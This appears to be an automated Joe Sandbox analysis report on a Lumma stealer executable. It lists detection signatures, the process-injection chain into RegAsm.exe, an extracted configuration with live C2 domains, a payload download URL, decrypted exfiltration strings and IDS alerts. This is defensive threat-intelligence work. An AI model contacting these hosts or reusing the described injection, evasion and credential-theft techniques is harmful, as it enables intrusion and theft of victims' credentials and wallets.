Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nlJ2sNaZVi.exe

Overview

General Information

Sample name:nlJ2sNaZVi.exe
renamed because original name is a hash value
Original sample name:5e443f31b2cf8b956afec50ad5c0f839.exe
Analysis ID:1555620
MD5:5e443f31b2cf8b956afec50ad5c0f839
SHA1:206caac0c2d6e47246f0c3df16fa5c72172e6bfd
SHA256:abe7949458ebfbdb53ad04c602bca49e30f346431b730a005c0ff3c59e06538e
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • nlJ2sNaZVi.exe (PID: 5700 cmdline: "C:\Users\user\Desktop\nlJ2sNaZVi.exe" MD5: 5E443F31B2CF8B956AFEC50AD5C0F839)
    • csc.exe (PID: 2892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • RegAsm.exe (PID: 6484 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["brownieyuz.sbs", "relalingj.sbs", "thinkyyokej.sbs", "tamedgeesy.sbs", "rottieud.sbs", "netwrokenb.cyou", "repostebhu.sbs", "ducksringjk.sbs", "explainvees.sbs"], "Build id": "yau6Na--6928154717"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: nlJ2sNaZVi.exe PID: 5700JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      Process Memory Space: RegAsm.exe PID: 6484JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\nlJ2sNaZVi.exe", ParentImage: C:\Users\user\Desktop\nlJ2sNaZVi.exe, ParentProcessId: 5700, ParentProcessName: nlJ2sNaZVi.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", ProcessId: 2892, ProcessName: csc.exe
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\nlJ2sNaZVi.exe, ProcessId: 5700, TargetFilename: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\nlJ2sNaZVi.exe", ParentImage: C:\Users\user\Desktop\nlJ2sNaZVi.exe, ParentProcessId: 5700, ParentProcessName: nlJ2sNaZVi.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", ProcessId: 2892, ProcessName: csc.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:37.356363+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549714TCP
          2024-11-14T08:09:16.237232+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549912TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:21.526630+010020283713Unknown Traffic192.168.2.549705188.114.96.3443TCP
          2024-11-14T08:08:23.248794+010020283713Unknown Traffic192.168.2.549706104.102.49.254443TCP
          2024-11-14T08:08:24.766719+010020283713Unknown Traffic192.168.2.549707188.114.96.3443TCP
          2024-11-14T08:08:26.182744+010020283713Unknown Traffic192.168.2.549708188.114.96.3443TCP
          2024-11-14T08:08:27.485559+010020283713Unknown Traffic192.168.2.549709188.114.96.3443TCP
          2024-11-14T08:08:28.661337+010020283713Unknown Traffic192.168.2.549710188.114.96.3443TCP
          2024-11-14T08:08:30.074954+010020283713Unknown Traffic192.168.2.549711188.114.96.3443TCP
          2024-11-14T08:08:31.420994+010020283713Unknown Traffic192.168.2.549712188.114.96.3443TCP
          2024-11-14T08:08:32.961765+010020283713Unknown Traffic192.168.2.549713188.114.96.3443TCP
          2024-11-14T08:08:36.008106+010020283713Unknown Traffic192.168.2.549715188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.073793+010020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
          2024-11-14T08:08:25.512984+010020546531A Network Trojan was detected192.168.2.549707188.114.96.3443TCP
          2024-11-14T08:08:26.697121+010020546531A Network Trojan was detected192.168.2.549708188.114.96.3443TCP
          2024-11-14T08:08:36.490906+010020546531A Network Trojan was detected192.168.2.549715188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.073793+010020498361A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
          2024-11-14T08:08:25.512984+010020498361A Network Trojan was detected192.168.2.549707188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:26.697121+010020498121A Network Trojan was detected192.168.2.549708188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:24.766719+010020574161Domain Observed Used for C2 Detected192.168.2.549707188.114.96.3443TCP
          2024-11-14T08:08:26.182744+010020574161Domain Observed Used for C2 Detected192.168.2.549708188.114.96.3443TCP
          2024-11-14T08:08:27.485559+010020574161Domain Observed Used for C2 Detected192.168.2.549709188.114.96.3443TCP
          2024-11-14T08:08:28.661337+010020574161Domain Observed Used for C2 Detected192.168.2.549710188.114.96.3443TCP
          2024-11-14T08:08:30.074954+010020574161Domain Observed Used for C2 Detected192.168.2.549711188.114.96.3443TCP
          2024-11-14T08:08:31.420994+010020574161Domain Observed Used for C2 Detected192.168.2.549712188.114.96.3443TCP
          2024-11-14T08:08:32.961765+010020574161Domain Observed Used for C2 Detected192.168.2.549713188.114.96.3443TCP
          2024-11-14T08:08:36.008106+010020574161Domain Observed Used for C2 Detected192.168.2.549715188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:21.526630+010020574111Domain Observed Used for C2 Detected192.168.2.549705188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.197367+010020573341Domain Observed Used for C2 Detected192.168.2.5493001.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.150149+010020573381Domain Observed Used for C2 Detected192.168.2.5530351.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.173799+010020573401Domain Observed Used for C2 Detected192.168.2.5554321.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:23.976547+010020574151Domain Observed Used for C2 Detected192.168.2.5494661.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:20.850724+010020574101Domain Observed Used for C2 Detected192.168.2.5639251.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.258707+010020573441Domain Observed Used for C2 Detected192.168.2.5528931.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.079251+010020573461Domain Observed Used for C2 Detected192.168.2.5510471.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.224280+010020573481Domain Observed Used for C2 Detected192.168.2.5558981.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.309758+010020573501Domain Observed Used for C2 Detected192.168.2.5513581.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:22.103876+010020573541Domain Observed Used for C2 Detected192.168.2.5625961.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:29.329609+010020480941Malware Command and Control Activity Detected192.168.2.549710188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:18.652472+010028000291Attempted User Privilege Gain147.45.44.13180192.168.2.549704TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-14T08:08:23.854551+010028586661Domain Observed Used for C2 Detected192.168.2.549706104.102.49.254443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: nlJ2sNaZVi.exeAvira: detected
          Source: https://marshal-zhukov.com/apiyaAvira URL Cloud: Label: malware
          Source: https://marshal-zhukov.com:443/apiicrosoftAvira URL Cloud: Label: malware
          Source: http://147.45.44.131/infopage/tbh75.exeAvira URL Cloud: Label: malware
          Source: https://marshal-zhukov.com:443/apiKAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
          Source: 5.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["brownieyuz.sbs", "relalingj.sbs", "thinkyyokej.sbs", "tamedgeesy.sbs", "rottieud.sbs", "netwrokenb.cyou", "repostebhu.sbs", "ducksringjk.sbs", "explainvees.sbs"], "Build id": "yau6Na--6928154717"}
          Source: nlJ2sNaZVi.exeReversingLabs: Detection: 55%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dllJoe Sandbox ML: detected
          Source: nlJ2sNaZVi.exeJoe Sandbox ML: detected
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tamedgeesy.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: relalingj.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rottieud.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: brownieyuz.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: explainvees.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ducksringjk.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: thinkyyokej.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: repostebhu.sbs
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: netwrokenb.cyou
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
          Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--6928154717
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00413F3B CryptUnprotectData,5_2_00413F3B
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: nlJ2sNaZVi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdbu source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000001022000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdb source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000003034000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edi], cx5_2_004180C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], cl5_2_0040D922
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h5_2_0043B930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_00409A40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+0000009Ch]5_2_00427A08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_0042731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esi+eax]5_2_00437D21
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h5_2_00421640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0000009Ch]5_2_00421640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1AFFABDAh5_2_0043B760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h5_2_004138E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_004138E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax5_2_00424166
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_00424166
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [eax]5_2_00422171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], 00000000h5_2_00422171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [eax]5_2_00422171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-31FA6CDBh]5_2_004161C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_004201F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h5_2_004259A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [004425F0h]5_2_0041FA5D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00423A11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+49CC0A96h]5_2_00426A19
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+49CC0A96h]5_2_00426865
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], bl5_2_004092C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ecx5_2_00421AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp esi5_2_0040AAEB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-31FA6CDBh]5_2_004161C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h5_2_00416367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]5_2_00416367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al5_2_00428379
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00423BD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_004253E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h5_2_00435B90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx5_2_00422BAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h5_2_00422BAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al5_2_00428447
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B62B8D10h5_2_00424457
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al5_2_00428459
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_00420470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al5_2_0042840A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h5_2_00435CE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+02ACBD5Ah]5_2_00435CE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 3E416E49h5_2_00435CE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi+69EFFF83h]5_2_00418C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+0000009Ch]5_2_00427D4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx+edx], 00000000h5_2_0040BD04
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_0042451F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h5_2_0041D520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [ebx]5_2_0043AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+0000009Ch]5_2_00427D36
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax-22h]5_2_00416DEB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_0041DDFF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], BB9B186Eh5_2_0043B5A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4E66B5A3h5_2_00435660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], B62B8D10h5_2_00435660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-00000089h]5_2_00417675
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], cl5_2_00417675
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al5_2_00419E20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_00419E20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]5_2_004166F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-00000089h]5_2_00417670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], cl5_2_00417670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-4Fh]5_2_00423710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax5_2_00423F24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esp+08h]5_2_004077F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax5_2_004077F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]5_2_004077F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx5_2_0041D780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+42E11899h]5_2_0040D787
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h5_2_00413798
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]5_2_004397A0

          Networking

          barindex
